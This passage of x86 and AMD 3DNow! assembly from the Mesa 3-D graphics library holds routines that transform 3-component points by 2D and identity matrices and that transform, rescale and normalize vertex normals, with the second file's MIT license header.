FADDP( ST0, ST(3) ) /* F4 F5 F6 */
FSTP_S( DST0 ) /* F5 F6 */
FSTP_S( DST1 ) /* F6 */
FSTP_S( DST2 ) /* */
LLBL(x86_p3_3dnrr_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p3_3dnrr_loop) )
LLBL(x86_p3_3dnrr_done):
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT16
/*
 * _mesa_x86_transform_points3_2d:
 * transform 3-component points by a 2D matrix: 2x2 rotation (m0,m1,m4,m5)
 * plus translation (m12,m13) applied to x/y; z is passed through unchanged
 * via an integer copy in EBX.
 * Register roles: ESI = src, EDI = dest, EDX = matrix, EAX = src stride,
 * ECX = dest end pointer, EBX = integer scratch for the z copy.
 */
GLOBL GLNAME( _mesa_x86_transform_points3_2d )
HIDDEN(_mesa_x86_transform_points3_2d)
GLNAME( _mesa_x86_transform_points3_2d ):
#define FRAME_OFFSET 12
PUSH_L( ESI )
PUSH_L( EDI )
PUSH_L( EBX )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX ) /* count == 0 -> done */
JZ( LLBL(x86_p3_2dr_done) )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(3), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX ) /* count * 16 bytes per dest point */
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX )
ALIGNTEXT16
LLBL(x86_p3_2dr_loop):
FLD_S( SRC0 ) /* F4 */
FMUL_S( MAT0 )
FLD_S( SRC0 ) /* F5 F4 */
FMUL_S( MAT1 )
FLD_S( SRC1 ) /* F0 F5 F4 */
FMUL_S( MAT4 )
FLD_S( SRC1 ) /* F1 F0 F5 F4 */
FMUL_S( MAT5 )
FXCH( ST(1) ) /* F0 F1 F5 F4 */
FADDP( ST0, ST(3) ) /* F1 F5 F4 */
FADDP( ST0, ST(1) ) /* F5 F4 */
FXCH( ST(1) ) /* F4 F5 */
FADD_S( MAT12 )
FXCH( ST(1) ) /* F5 F4 */
FADD_S( MAT13 )
MOV_L( SRC2, EBX ) /* z passes through untouched */
FXCH( ST(1) ) /* F4 F5 */
FSTP_S( DST0 ) /* F5 */
FSTP_S( DST1 ) /* */
MOV_L( EBX, DST2 )
LLBL(x86_p3_2dr_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p3_2dr_loop) )
LLBL(x86_p3_2dr_done):
POP_L( EBX )
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT16
/*
 * _mesa_x86_transform_points3_2d_no_rot:
 * transform 3-component points by a 2D scale+translate matrix (no
 * rotation): r = (x*m0 + m12, y*m5 + m13, z), with z copied through as
 * a raw 32-bit integer in EBX.
 * Register roles: ESI = src, EDI = dest, EDX = matrix, EAX = src stride,
 * ECX = dest end pointer, EBX = integer scratch for the z copy.
 */
GLOBL GLNAME( _mesa_x86_transform_points3_2d_no_rot )
HIDDEN(_mesa_x86_transform_points3_2d_no_rot)
GLNAME( _mesa_x86_transform_points3_2d_no_rot ):
#define FRAME_OFFSET 12
PUSH_L( ESI )
PUSH_L( EDI )
PUSH_L( EBX )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX ) /* count == 0 -> done */
JZ( LLBL(x86_p3_2dnrr_done) )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(3), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX ) /* count * 16 bytes per dest point */
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX )
ALIGNTEXT16
LLBL(x86_p3_2dnrr_loop):
FLD_S( SRC0 ) /* F4 */
FMUL_S( MAT0 )
FLD_S( SRC1 ) /* F1 F4 */
FMUL_S( MAT5 )
FXCH( ST(1) ) /* F4 F1 */
FADD_S( MAT12 )
FLD_S( MAT13 ) /* F5 F4 F1 */
FXCH( ST(2) ) /* F1 F4 F5 */
FADDP( ST0, ST(2) ) /* F4 F5 */
MOV_L( SRC2, EBX ) /* z passes through untouched */
FSTP_S( DST0 ) /* F5 */
FSTP_S( DST1 ) /* */
MOV_L( EBX, DST2 )
LLBL(x86_p3_2dnrr_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p3_2dnrr_loop) )
LLBL(x86_p3_2dnrr_done):
POP_L( EBX )
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT16
/*
 * _mesa_x86_transform_points3_identity:
 * identity "transform" -- copies 3 components per point using integer
 * registers (EBX/EBP/EDX); the disabled #else branch is the x87
 * equivalent.  Skips the copy loop entirely when src and dest start at
 * the same address.
 * Register roles: ESI = src, EDI = dest, EAX = src stride,
 * ECX = dest end pointer; EBX/EBP/EDX = copy scratch.
 */
GLOBL GLNAME( _mesa_x86_transform_points3_identity )
HIDDEN(_mesa_x86_transform_points3_identity)
GLNAME(_mesa_x86_transform_points3_identity ):
#define FRAME_OFFSET 16
PUSH_L( ESI )
PUSH_L( EDI )
PUSH_L( EBX )
PUSH_L( EBP )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX ) /* count == 0 -> done */
JZ( LLBL(x86_p3_ir_done) )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(3), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX )
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX )
CMP_L( ESI, EDI ) /* src == dest -> nothing to copy */
JE( LLBL(x86_p3_ir_done) )
ALIGNTEXT16
LLBL(x86_p3_ir_loop):
#if 1
MOV_L( SRC0, EBX )
MOV_L( SRC1, EBP )
MOV_L( SRC2, EDX )
MOV_L( EBX, DST0 )
MOV_L( EBP, DST1 )
MOV_L( EDX, DST2 )
#else
FLD_S( SRC0 )
FLD_S( SRC1 )
FLD_S( SRC2 )
FSTP_S( DST2 )
FSTP_S( DST1 )
FSTP_S( DST0 )
#endif
LLBL(x86_p3_ir_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p3_ir_loop) )
LLBL(x86_p3_ir_done):
POP_L( EBP )
POP_L( EBX )
POP_L( EDI )
POP_L( ESI )
RET
#if defined (__ELF__) && defined (__linux__)
.section .note.GNU-stack,"",%progbits
#endif
|
AIFM-sys/AIFM
| 30,485
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/x86/3dnow_normal.S
|
/* $Id: 3dnow_normal.S,v 1.1.1.1 2012/03/29 17:22:10 uid42307 Exp $ */
/*
* Mesa 3-D graphics library
* Version: 5.1
*
* Copyright (C) 1999-2003 Brian Paul All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* BRIAN PAUL BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
* AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
/*
* 3Dnow assembly code by Holger Waechtler
*/
#ifdef USE_3DNOW_ASM
#include "matypes.h"
#include "norm_args.h"
SEG_TEXT
#define M(i) REGOFF(i * 4, ECX)
#define STRIDE REGOFF(12, ESI)
ALIGNTEXT16
/*
 * _mesa_3dnow_transform_normalize_normals:
 * transform normals by the 3x3 part of mat->inv (3DNow!), then normalize.
 * If ARG_LENGTHS is NULL the matrix rows are pre-scaled by ARG_SCALE and
 * unit length is produced with the PFRSQRT + PFRSQIT1/PFRCPIT2
 * Newton-Raphson refinement; otherwise the precomputed reciprocal
 * lengths array is used directly.
 * Register roles: ESI = in vector, EDX = in->start / walk ptr,
 * EAX = dest walk ptr, ECX = mat->inv, EDI = lengths ptr, EBP = counter.
 * MM3..MM7 cache the (possibly scaled) matrix entries across the loop.
 */
GLOBL GLNAME(_mesa_3dnow_transform_normalize_normals)
HIDDEN(_mesa_3dnow_transform_normalize_normals)
GLNAME(_mesa_3dnow_transform_normalize_normals):
#define FRAME_OFFSET 12
PUSH_L ( EDI )
PUSH_L ( ESI )
PUSH_L ( EBP )
MOV_L ( ARG_LENGTHS, EDI )
MOV_L ( ARG_IN, ESI )
MOV_L ( ARG_DEST, EAX )
MOV_L ( REGOFF(V4F_COUNT, ESI), EBP ) /* dest->count = in->count */
MOV_L ( EBP, REGOFF(V4F_COUNT, EAX) )
MOV_L ( REGOFF(V4F_START, ESI), EDX ) /* in->start */
MOV_L ( REGOFF(V4F_START, EAX), EAX ) /* dest->start */
MOV_L ( ARG_MAT, ECX )
MOV_L ( REGOFF(MATRIX_INV, ECX), ECX ) /* mat->inv */
CMP_L ( CONST(0), EBP ) /* count > 0 ?? */
JE ( LLBL (G3TN_end) )
MOV_L ( REGOFF (V4F_COUNT, ESI), EBP )
FEMMS
PUSH_L ( EBP )
PUSH_L ( EAX )
PUSH_L ( EDX ) /* save counter & pointer for */
/* the normalize pass */
#undef FRAME_OFFSET
#define FRAME_OFFSET 24
MOVQ ( M(0), MM3 ) /* m1 | m0 */
MOVQ ( M(4), MM4 ) /* m5 | m4 */
MOVD ( M(2), MM5 ) /* | m2 */
PUNPCKLDQ ( M(6), MM5 ) /* m6 | m2 */
MOVQ ( M(8), MM6 ) /* m9 | m8 */
MOVQ ( M(10), MM7 ) /* | m10 */
CMP_L ( CONST(0), EDI ) /* lengths == 0 ? */
JNE ( LLBL (G3TN_scale_end ) )
/* no precomputed lengths: fold ARG_SCALE into the matrix rows */
MOVD ( ARG_SCALE, MM0 ) /* | scale */
PUNPCKLDQ ( MM0, MM0 ) /* scale | scale */
PFMUL ( MM0, MM3 ) /* scale * m1 | scale * m0 */
PFMUL ( MM0, MM4 ) /* scale * m5 | scale * m4 */
PFMUL ( MM0, MM5 ) /* scale * m6 | scale * m2 */
PFMUL ( MM0, MM6 ) /* scale * m9 | scale * m8 */
PFMUL ( MM0, MM7 ) /* | scale * m10 */
ALIGNTEXT32
LLBL (G3TN_scale_end):
LLBL (G3TN_transform):
MOVQ ( REGIND (EDX), MM0 ) /* x1 | x0 */
MOVD ( REGOFF (8, EDX), MM2 ) /* | x2 */
MOVQ ( MM0, MM1 ) /* x1 | x0 */
PUNPCKLDQ ( MM2, MM2 ) /* x2 | x2 */
PFMUL ( MM3, MM0 ) /* x1*m1 | x0*m0 */
ADD_L ( CONST(16), EAX ) /* next r */
PREFETCHW ( REGIND(EAX) )
PFMUL ( MM4, MM1 ) /* x1*m5 | x0*m4 */
PFACC ( MM1, MM0 ) /* x0*m4+x1*m5 | x0*m0+x1*m1 */
PFMUL ( MM5, MM2 ) /* x2*m6 | x2*m2 */
PFADD ( MM2, MM0 ) /* x0*m4+x1*m5+x2*m6| x0*m0+...+x2**/
MOVQ ( REGIND (EDX), MM1 ) /* x1 | x0 */
MOVQ ( MM0, REGOFF(-16, EAX) ) /* write r0, r1 */
PFMUL ( MM6, MM1 ) /* x1*m9 | x0*m8 */
MOVD ( REGOFF (8, EDX), MM2 ) /* | x2 */
PFMUL ( MM7, MM2 ) /* | x2*m10 */
PFACC ( MM1, MM1 ) /* *not used* | x0*m8+x1*m9 */
PFADD ( MM2, MM1 ) /* *not used* | x0*m8+x1*m9+x2*m*/
ADD_L ( STRIDE, EDX ) /* next normal */
PREFETCH ( REGIND(EDX) )
MOVD ( MM1, REGOFF(-8, EAX) ) /* write r2 */
SUB_L ( CONST(1), EBP ) /* decrement normal counter */
JNZ ( LLBL (G3TN_transform) )
POP_L ( EDX ) /* end of transform --- */
POP_L ( EAX ) /* now normalizing ... */
POP_L ( EBP )
CMP_L ( CONST(0), EDI ) /* lengths == 0 ? */
JE ( LLBL (G3TN_norm ) ) /* calculate lengths */
ALIGNTEXT32
LLBL (G3TN_norm_w_lengths): /* scale the transformed results in place at EAX */
PREFETCHW ( REGOFF(12,EAX) )
MOVQ ( REGIND(EAX), MM0 ) /* x1 | x0 */
MOVD ( REGOFF(8, EAX), MM1 ) /* | x2 */
MOVD ( REGIND (EDI), MM3 ) /* | length (x) */
PFMUL ( MM3, MM1 ) /* | x2 (normalize*/
PUNPCKLDQ ( MM3, MM3 ) /* length (x) | length (x) */
PFMUL ( MM3, MM0 ) /* x1 (normalized) | x0 (normalize*/
ADD_L ( STRIDE, EDX ) /* next normal */
/* NOTE(review): the EDX advance above looks vestigial -- this loop walks
 * the results via EAX only; confirm against the other normalize loops */
ADD_L ( CONST(4), EDI ) /* next length */
PREFETCH ( REGIND(EDI) )
MOVQ ( MM0, REGIND(EAX) ) /* write new x0, x1 */
MOVD ( MM1, REGOFF(8, EAX) ) /* write new x2 */
ADD_L ( CONST(16), EAX ) /* next r */
SUB_L ( CONST(1), EBP ) /* decrement normal counter */
JNZ ( LLBL (G3TN_norm_w_lengths) )
JMP ( LLBL (G3TN_exit_3dnow) )
ALIGNTEXT32
LLBL (G3TN_norm): /* compute 1/sqrt(x.x) per normal (Newton-Raphson) */
PREFETCHW ( REGIND(EAX) )
MOVQ ( REGIND (EAX), MM0 ) /* x1 | x0 */
MOVD ( REGOFF(8, EAX), MM1 ) /* | x2 */
MOVQ ( MM0, MM3 ) /* x1 | x0 */
MOVQ ( MM1, MM4 ) /* | x2 */
PFMUL ( MM0, MM3 ) /* x1*x1 | x0*x0 */
ADD_L ( CONST(16), EAX ) /* next r */
PFMUL ( MM1, MM4 ) /* | x2*x2 */
PFADD ( MM4, MM3 ) /* | x0*x0+x2*x2 */
PFACC ( MM3, MM3 ) /* **not used** | x0*x0+x1*x1+x2**/
PFRSQRT ( MM3, MM5 ) /* 1/sqrt (x0*x0+x1*x1+x2*x2) */
MOVQ ( MM5, MM4 )
PUNPCKLDQ ( MM3, MM3 )
SUB_L ( CONST(1), EBP ) /* decrement normal counter */
PFMUL ( MM5, MM5 )
PFRSQIT1 ( MM3, MM5 )
PFRCPIT2 ( MM4, MM5 ) /* refined 1/sqrt in both halves of MM5 */
PFMUL ( MM5, MM0 ) /* x1 (normalized) | x0 (normalize*/
MOVQ ( MM0, REGOFF(-16, EAX) ) /* write new x0, x1 */
PFMUL ( MM5, MM1 ) /* | x2 (normalize*/
MOVD ( MM1, REGOFF(-8, EAX) ) /* write new x2 */
JNZ ( LLBL (G3TN_norm) )
LLBL (G3TN_exit_3dnow):
FEMMS
LLBL (G3TN_end):
POP_L ( EBP )
POP_L ( ESI )
POP_L ( EDI )
RET
ALIGNTEXT16
/*
 * _mesa_3dnow_transform_normalize_normals_no_rot:
 * same as _mesa_3dnow_transform_normalize_normals but for a matrix with
 * no rotation part: only m0, m5, m10 of mat->inv are read, so transform
 * and normalize happen in a single fused loop (no intermediate pass).
 * Register roles: EDX = in walk ptr, EAX = dest walk ptr, ECX = mat->inv,
 * EDI = lengths ptr (or NULL), EBP = counter.  MM0/MM2 cache the
 * (possibly ARG_SCALE-scaled) diagonal entries.
 */
GLOBL GLNAME(_mesa_3dnow_transform_normalize_normals_no_rot)
HIDDEN(_mesa_3dnow_transform_normalize_normals_no_rot)
GLNAME(_mesa_3dnow_transform_normalize_normals_no_rot):
#undef FRAME_OFFSET
#define FRAME_OFFSET 12
PUSH_L ( EDI )
PUSH_L ( ESI )
PUSH_L ( EBP )
MOV_L ( ARG_LENGTHS, EDI )
MOV_L ( ARG_IN, ESI )
MOV_L ( ARG_DEST, EAX )
MOV_L ( REGOFF(V4F_COUNT, ESI), EBP ) /* dest->count = in->count */
MOV_L ( EBP, REGOFF(V4F_COUNT, EAX) )
MOV_L ( ARG_MAT, ECX )
MOV_L ( REGOFF(V4F_START, EAX), EAX ) /* dest->start */
MOV_L ( REGOFF(MATRIX_INV, ECX), ECX ) /* mat->inv */
MOV_L ( REGOFF(V4F_START, ESI), EDX ) /* in->start */
CMP_L ( CONST(0), EBP ) /* count > 0 ?? */
JE ( LLBL (G3TNNR_end) )
FEMMS
MOVD ( M(0), MM0 ) /* | m0 */
PUNPCKLDQ ( M(5), MM0 ) /* m5 | m0 */
MOVD ( M(10), MM2 ) /* | m10 */
PUNPCKLDQ ( MM2, MM2 ) /* m10 | m10 */
CMP_L ( CONST(0), EDI ) /* lengths == 0 ? */
JNE ( LLBL (G3TNNR_scale_end ) )
/* no precomputed lengths: fold ARG_SCALE into the diagonal */
MOVD ( ARG_SCALE, MM7 ) /* | scale */
PUNPCKLDQ ( MM7, MM7 ) /* scale | scale */
PFMUL ( MM7, MM0 ) /* scale * m5 | scale * m0 */
PFMUL ( MM7, MM2 ) /* scale * m10 | scale * m10 */
ALIGNTEXT32
LLBL (G3TNNR_scale_end):
CMP_L ( CONST(0), EDI ) /* lengths == 0 ? */
JE ( LLBL (G3TNNR_norm) ) /* need to calculate lengths */
MOVD ( REGIND(EDI), MM3 ) /* | length (x) */
ALIGNTEXT32
LLBL (G3TNNR_norm_w_lengths): /* use precalculated lengths */
PREFETCHW ( REGIND(EAX) )
MOVQ ( REGIND(EDX), MM6 ) /* x1 | x0 */
MOVD ( REGOFF(8, EDX), MM7 ) /* | x2 */
PFMUL ( MM0, MM6 ) /* x1*m5 | x0*m0 */
ADD_L ( STRIDE, EDX ) /* next normal */
PREFETCH ( REGIND(EDX) )
PFMUL ( MM2, MM7 ) /* | x2*m10 */
ADD_L ( CONST(16), EAX ) /* next r */
PFMUL ( MM3, MM7 ) /* | x2 (normalized) */
PUNPCKLDQ ( MM3, MM3 ) /* length (x) | length (x) */
ADD_L ( CONST(4), EDI ) /* next length */
PFMUL ( MM3, MM6 ) /* x1 (normalized) | x0 (normalized) */
SUB_L ( CONST(1), EBP ) /* decrement normal counter */
MOVQ ( MM6, REGOFF(-16, EAX) ) /* write r0, r1 */
MOVD ( MM7, REGOFF(-8, EAX) ) /* write r2 */
MOVD ( REGIND(EDI), MM3 ) /* | length (x) */
JNZ ( LLBL (G3TNNR_norm_w_lengths) )
JMP ( LLBL (G3TNNR_exit_3dnow) )
ALIGNTEXT32
LLBL (G3TNNR_norm): /* need to calculate lengths */
PREFETCHW ( REGIND(EAX) )
MOVQ ( REGIND(EDX), MM6 ) /* x1 | x0 */
MOVD ( REGOFF(8, EDX), MM7 ) /* | x2 */
PFMUL ( MM0, MM6 ) /* x1*m5 | x0*m0 */
ADD_L ( CONST(16), EAX ) /* next r */
PFMUL ( MM2, MM7 ) /* | x2*m10 */
MOVQ ( MM6, MM3 ) /* x1 (transformed)| x0 (transformed) */
MOVQ ( MM7, MM4 ) /* | x2 (transformed) */
PFMUL ( MM6, MM3 ) /* x1*x1 | x0*x0 */
PFMUL ( MM7, MM4 ) /* | x2*x2 */
PFACC ( MM3, MM3 ) /* **not used** | x0*x0+x1*x1 */
PFADD ( MM4, MM3 ) /* | x0*x0+x1*x1+x2*x2*/
ADD_L ( STRIDE, EDX ) /* next normal */
PREFETCH ( REGIND(EDX) )
PFRSQRT ( MM3, MM5 ) /* 1/sqrt (x0*x0+x1*x1+x2*x2) */
MOVQ ( MM5, MM4 )
PUNPCKLDQ ( MM3, MM3 )
PFMUL ( MM5, MM5 )
PFRSQIT1 ( MM3, MM5 )
SUB_L ( CONST(1), EBP ) /* decrement normal counter */
PFRCPIT2 ( MM4, MM5 ) /* Newton-Raphson refined 1/sqrt */
PFMUL ( MM5, MM6 ) /* x1 (normalized) | x0 (normalized) */
MOVQ ( MM6, REGOFF(-16, EAX) ) /* write r0, r1 */
PFMUL ( MM5, MM7 ) /* | x2 (normalized) */
MOVD ( MM7, REGOFF(-8, EAX) ) /* write r2 */
JNZ ( LLBL (G3TNNR_norm) )
LLBL (G3TNNR_exit_3dnow):
FEMMS
LLBL (G3TNNR_end):
POP_L ( EBP )
POP_L ( ESI )
POP_L ( EDI )
RET
ALIGNTEXT16
/*
 * _mesa_3dnow_transform_rescale_normals_no_rot:
 * transform normals by the diagonal (m0, m5, m10) of mat->inv, with
 * ARG_SCALE folded into the diagonal up front.  No normalization pass.
 * Register roles: EDX = in walk ptr, EAX = dest walk ptr, ECX = mat->inv,
 * EBP = counter.  MM0 = (scale*m5 | scale*m0), MM2 = (| scale*m10).
 */
GLOBL GLNAME(_mesa_3dnow_transform_rescale_normals_no_rot)
HIDDEN(_mesa_3dnow_transform_rescale_normals_no_rot)
GLNAME(_mesa_3dnow_transform_rescale_normals_no_rot):
#undef FRAME_OFFSET
#define FRAME_OFFSET 12
PUSH_L ( EDI )
PUSH_L ( ESI )
PUSH_L ( EBP )
MOV_L ( ARG_IN, EAX )
MOV_L ( ARG_DEST, EDX )
MOV_L ( REGOFF(V4F_COUNT, EAX), EBP ) /* dest->count = in->count */
MOV_L ( EBP, REGOFF(V4F_COUNT, EDX) )
MOV_L ( ARG_IN, ESI )
MOV_L ( ARG_MAT, ECX )
MOV_L ( REGOFF(MATRIX_INV, ECX), ECX ) /* mat->inv */
MOV_L ( REGOFF(V4F_START, EDX), EAX ) /* dest->start */
MOV_L ( REGOFF(V4F_START, ESI), EDX ) /* in->start */
CMP_L ( CONST(0), EBP ) /* count == 0 -> done */
JE ( LLBL (G3TRNR_end) )
FEMMS
MOVD ( ARG_SCALE, MM6 ) /* | scale */
PUNPCKLDQ ( MM6, MM6 ) /* scale | scale */
MOVD ( REGIND(ECX), MM0 ) /* | m0 */
PUNPCKLDQ ( REGOFF(20, ECX), MM0 ) /* m5 | m0 */
PFMUL ( MM6, MM0 ) /* scale*m5 | scale*m0 */
MOVD ( REGOFF(40, ECX), MM2 ) /* | m10 */
PFMUL ( MM6, MM2 ) /* | scale*m10 */
ALIGNTEXT32
LLBL (G3TRNR_rescale):
PREFETCHW ( REGIND(EAX) )
MOVQ ( REGIND(EDX), MM4 ) /* x1 | x0 */
MOVD ( REGOFF(8, EDX), MM5 ) /* | x2 */
PFMUL ( MM0, MM4 ) /* x1*m5 | x0*m0 */
ADD_L ( STRIDE, EDX ) /* next normal */
PREFETCH ( REGIND(EDX) )
PFMUL ( MM2, MM5 ) /* | x2*m10 */
ADD_L ( CONST(16), EAX ) /* next r */
SUB_L ( CONST(1), EBP ) /* decrement normal counter */
MOVQ ( MM4, REGOFF(-16, EAX) ) /* write r0, r1 */
MOVD ( MM5, REGOFF(-8, EAX) ) /* write r2 */
JNZ ( LLBL (G3TRNR_rescale) ) /* cnt > 0 ? -> process next normal */
FEMMS
LLBL (G3TRNR_end):
POP_L ( EBP )
POP_L ( ESI )
POP_L ( EDI )
RET
ALIGNTEXT16
/*
 * _mesa_3dnow_transform_rescale_normals:
 * transform normals by the full 3x3 part of mat->inv with ARG_SCALE
 * pre-folded into every matrix entry.  No normalization pass.
 * Register roles: EDX = in walk ptr, EAX = dest walk ptr, ECX = mat->inv,
 * EDI = counter.  MM3..MM7 cache the scaled matrix rows across the loop.
 */
GLOBL GLNAME(_mesa_3dnow_transform_rescale_normals)
HIDDEN(_mesa_3dnow_transform_rescale_normals)
GLNAME(_mesa_3dnow_transform_rescale_normals):
#undef FRAME_OFFSET
#define FRAME_OFFSET 8
PUSH_L ( EDI )
PUSH_L ( ESI )
MOV_L ( ARG_IN, ESI )
MOV_L ( ARG_DEST, EAX )
MOV_L ( ARG_MAT, ECX )
MOV_L ( REGOFF(V4F_COUNT, ESI), EDI ) /* dest->count = in->count */
MOV_L ( EDI, REGOFF(V4F_COUNT, EAX) )
MOV_L ( REGOFF(V4F_START, EAX), EAX ) /* dest->start */
MOV_L ( REGOFF(V4F_START, ESI), EDX ) /* in->start */
MOV_L ( REGOFF(MATRIX_INV, ECX), ECX ) /* mat->inv */
CMP_L ( CONST(0), EDI ) /* count == 0 -> done */
JE ( LLBL (G3TR_end) )
FEMMS
MOVQ ( REGIND(ECX), MM3 ) /* m1 | m0 */
MOVQ ( REGOFF(16,ECX), MM4 ) /* m5 | m4 */
MOVD ( ARG_SCALE, MM0 ) /* scale */
MOVD ( REGOFF(8,ECX), MM5 ) /* | m2 */
PUNPCKLDQ ( MM0, MM0 ) /* scale | scale */
PUNPCKLDQ ( REGOFF(24, ECX), MM5 ) /* m6 | m2 */
PFMUL ( MM0, MM3 ) /* scale*m1 | scale*m0 */
MOVQ ( REGOFF(32, ECX), MM6 ) /* m9 | m8*/
PFMUL ( MM0, MM4 ) /* scale*m5 | scale*m4 */
MOVD ( REGOFF(40, ECX), MM7 ) /* | m10 */
PFMUL ( MM0, MM5 ) /* scale*m6 | scale*m2 */
PFMUL ( MM0, MM6 ) /* scale*m9 | scale*m8 */
PFMUL ( MM0, MM7 ) /* | scale*m10 */
ALIGNTEXT32
LLBL (G3TR_rescale):
PREFETCHW ( REGIND(EAX) )
MOVQ ( REGIND(EDX), MM0 ) /* x1 | x0 */
MOVD ( REGOFF(8, EDX), MM2 ) /* | x2 */
MOVQ ( MM0, MM1 ) /* x1 | x0 */
PUNPCKLDQ ( MM2, MM2 ) /* x2 | x2 */
PFMUL ( MM3, MM0 ) /* x1*m1 | x0*m0 */
ADD_L ( CONST(16), EAX ) /* next r */
PFMUL ( MM4, MM1 ) /* x1*m5 | x0*m4 */
PFACC ( MM1, MM0 ) /* x0*m4+x1*m5 | x0*m0+x1*m1 */
MOVQ ( REGIND(EDX), MM1 ) /* x1 | x0 */
PFMUL ( MM5, MM2 ) /* x2*m6 | x2*m2 */
PFADD ( MM2, MM0 ) /* x0*m4...+x2*m6| x0*m0+x1*m1+x2*m2 */
MOVD ( REGOFF(8, EDX), MM2 ) /* | x2 */
ADD_L ( STRIDE, EDX ) /* next normal */
PREFETCH ( REGIND(EDX) )
MOVQ ( MM0, REGOFF(-16, EAX) ) /* write r0, r1 */
PFMUL ( MM6, MM1 ) /* x1*m9 | x0*m8 */
PFMUL ( MM7, MM2 ) /* | x2*m10 */
PFACC ( MM1, MM1 ) /* *not used* | x0*m8+x1*m9 */
PFADD ( MM2, MM1 ) /* *not used* | x0*m8+x1*m9+x2*m10 */
MOVD ( MM1, REGOFF(-8, EAX) ) /* write r2 */
SUB_L ( CONST(1), EDI ) /* decrement normal counter */
JNZ ( LLBL (G3TR_rescale) )
FEMMS
LLBL (G3TR_end):
POP_L ( ESI )
POP_L ( EDI )
RET
ALIGNTEXT16
/*
 * _mesa_3dnow_transform_normals_no_rot:
 * transform normals by the diagonal (m0, m5, m10) of mat->inv only --
 * no scale factor, no normalization.
 * Register roles: EDX = in walk ptr, EAX = dest walk ptr, ECX = mat->inv,
 * EDI = counter.  MM0 = (m5 | m0), MM2 = (m10 | m10).
 */
GLOBL GLNAME(_mesa_3dnow_transform_normals_no_rot)
HIDDEN(_mesa_3dnow_transform_normals_no_rot)
GLNAME(_mesa_3dnow_transform_normals_no_rot):
#undef FRAME_OFFSET
#define FRAME_OFFSET 8
PUSH_L ( EDI )
PUSH_L ( ESI )
MOV_L ( ARG_IN, ESI )
MOV_L ( ARG_DEST, EAX )
MOV_L ( ARG_MAT, ECX )
MOV_L ( REGOFF(V4F_COUNT, ESI), EDI ) /* dest->count = in->count */
MOV_L ( EDI, REGOFF(V4F_COUNT, EAX) )
MOV_L ( REGOFF(V4F_START, EAX), EAX ) /* dest->start */
MOV_L ( REGOFF(V4F_START, ESI), EDX ) /* in->start */
MOV_L ( REGOFF(MATRIX_INV, ECX), ECX ) /* mat->inv */
CMP_L ( CONST(0), EDI ) /* count == 0 -> done */
JE ( LLBL (G3TNR_end) )
FEMMS
MOVD ( REGIND(ECX), MM0 ) /* | m0 */
PUNPCKLDQ ( REGOFF(20, ECX), MM0 ) /* m5 | m0 */
MOVD ( REGOFF(40, ECX), MM2 ) /* | m10 */
PUNPCKLDQ ( MM2, MM2 ) /* m10 | m10 */
ALIGNTEXT32
LLBL (G3TNR_transform):
PREFETCHW ( REGIND(EAX) )
MOVQ ( REGIND(EDX), MM4 ) /* x1 | x0 */
MOVD ( REGOFF(8, EDX), MM5 ) /* | x2 */
PFMUL ( MM0, MM4 ) /* x1*m5 | x0*m0 */
ADD_L ( STRIDE, EDX) /* next normal */
